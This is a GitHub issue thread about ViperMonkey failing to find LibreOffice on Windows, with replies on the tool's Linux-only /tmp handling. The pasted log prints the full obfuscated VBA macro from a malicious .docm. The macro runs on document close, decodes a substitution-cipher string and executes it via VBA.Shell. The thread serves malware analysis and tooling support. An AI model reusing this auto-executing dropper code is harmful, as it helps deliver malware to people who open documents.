Vipermonkey says LibreOffice not installed, but it is
opticoax747 opened this issue · 4 comments
Running vipermonkey on flare-vm cygwin environment, trying to parse an infected .docm.
LibreOffice is installed, but Vipermonkey doesnt see it and errors out
FILE: c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm
INFO Starting emulation...
INFO Emulating an Office (VBA) file. VBScript support is temporarily disabled in this version.
INFO Reading document metadata...
WARNING Reading in metadata failed. Trying fallback. not an OLE2 structured storage file
ERROR Cannot read metadata with exiftool. [Error 2] The system cannot find the file specified
ERROR Reading in file as Excel with xlrd failed. ZIP file contents not a known type of workbook
ERROR Cannot convert Excel file with LibreOffice. LibreOffice not installed.
INFO Saving dropped analysis artifacts in c:\Users\IEUser\Desktop\Files and PCAPs\f11b7237907275ca59ce4f0b630f69a6c3770b0060359917bf465690e2309e47 (1).docm_artifacts/
INFO Parsing VB...
Error: [Errno 2] No such file or directory: u'word/vbaProject.bin'.
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
VBA CODE (with long lines collapsed):
Sub AutoClose()
roans = Array("d", "J", "t", "s", "e", "A", "h", "0", "h", "j", "t", "s", "s", "V", "o", "q", "q", "n", "P", "5", "Z", "n", "9", "P", "L", "l", "n", "9", "5", "n", "t", "9", "h", "9", "A", "x", "E", "d", "q", "G", "Q", "q", "J", "d", "5", "0", "A", "V", "t", "V", "N", "L", "s", "d", "e", "X", "P", "E", "l", "P")
totoro = ceraunogram(roans)
Application.Run "chillumchee", (totoro)
End Sub
Private Sub chillumchee(brothy)
declination = 6162
samoan = True
While samoan
boneblack = declination + 222
If boneblack - declination > 111 Then
VBA.Shell brothy, vbNormalFocus - 1
samoan = False
End If
Wend
End Sub
Public Function trinely(germaneness, preludium)
russophobist = 9090
categoryator = -1
For Each drolled In preludium
If drolled = germaneness Then
russophobist = categoryator
Exit For
End If
categoryator = categoryator + 1
Next
If russophobist = 9090 Then
russophobist = -1
End If
trinely = russophobist + 1
End Function
Private Function ceraunogram(roans)
malope = Array("s", "P", "G", "q", "e", "d", "9", "Q", "x", "E", "j", "n", "N", "X", "t", "h", "L", "o", "V", "0", "A", "J", "Z", "5", "l")
roughhoused = Array("t", "d", "N", "/", "a", "m", "w", "A", "c", "o", " ", "q", "?", "=", "h", "e", "u", ":", "p", "x", ".", "s", "j", "i", "n")
erasable = vbNullString
For Each paraphrenic In roans
ore = Application.Run("trinely", paraphrenic, malope)
If ore > -1 And ore < 8080 Then
erasable = roughhoused(ore) + erasable
End If
Next
ceraunogram = StrReverse(erasable)
End Function
PARSING VBA CODE:
INFO parsed Sub AutoClose (): 3 statement(s)
INFO parsed Sub chillumchee ([ByRef brothy]): 3 statement(s)
INFO parsed Function trinely ([ByRef germaneness, ByRef preludium]): 5 statement(s)
INFO parsed Function ceraunogram ([ByRef roans]): 5 statement(s)
INFO Reading document variables...
INFO Reading Shapes object text fields...
Traceback (most recent call last):
File "vmonkey.py", line 1311, in _process_file
shape_text = read_ole_fields._get_shapes_text_values(data, 'worddocument')
File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 371, in _get_shapes_text_values
r = _get_shapes_text_values_2007(fname)
File "c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey\core\read_ole_fields.py", line 223, in _get_shapes_text_values_2007
f = open(tmp_name, 'wb')
IOError: [Errno 2] No such file or directory: '/tmp/9762170042.office'
ERROR [Errno 2] No such file or directory: '/tmp/9762170042.office'
c:\Users\IEUser\Desktop\ViperMonkey-master\ViperMonkey-master\vipermonkey
I think for now the call to LibreOffice only works on Linux. Usually on Windows it displays an error but does not stop. I'll have a look.
ok, i will try to get a licensed version of Word on Windows? Would that be better?
No no, I just meant the code in ViperMonkey which deals with LibreOffice is only designed to work on Linux, because it uses paths like /tmp (see the error message you pasted above). What we need to do (if somebody has time), is to improve the code so that it can work with LibreOffice on Windows too.
I did hardcode the path to Windows Libre Office into the .py, but it still errored out.
I think my office will give me a Word license...